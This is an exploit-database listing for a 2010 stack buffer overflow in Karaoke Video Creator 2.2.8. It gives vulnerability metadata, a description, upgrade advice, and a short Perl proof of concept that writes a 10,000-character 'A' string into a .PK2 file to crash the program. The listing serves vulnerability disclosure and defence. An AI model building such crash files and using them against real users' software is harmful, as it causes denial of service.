header-logo
Suggest Exploit
vendor:
Karaoke Video Creator
by:
PASSEWORD
7,8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Karaoke Video Creator
Affected Version From: 2.2.8
Affected Version To: 2.2.8
Patch Exists: YES
Related CWE: N/A
CPE: a:powerkaraoke:karaoke_video_creator
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 Fr
2010

Karaoke Video Creator Denial of Service Vulnerability

A buffer overflow vulnerability exists in Karaoke Video Creator 2.2.8, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a boundary error when processing a specially crafted .PK2 file. This can be exploited to cause a stack-based buffer overflow via an overly long string. Successful exploitation may allow execution of arbitrary code, but this has not been confirmed.

Mitigation:

Upgrade to the latest version of Karaoke Video Creator.
Source

Exploit-DB raw data:

# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability
# Author: PASSEWORD
# Date: 2010-08-20
# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php
# Version : 2.2.8
# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers
# Tested on: Windows XP SP3 Fr

$buff="A" x 10000;
open (myfile , ">>PASS.PK2");
print myfile $buff;
close (myfile);

Navigation

Suggest Exploit

Services By CQR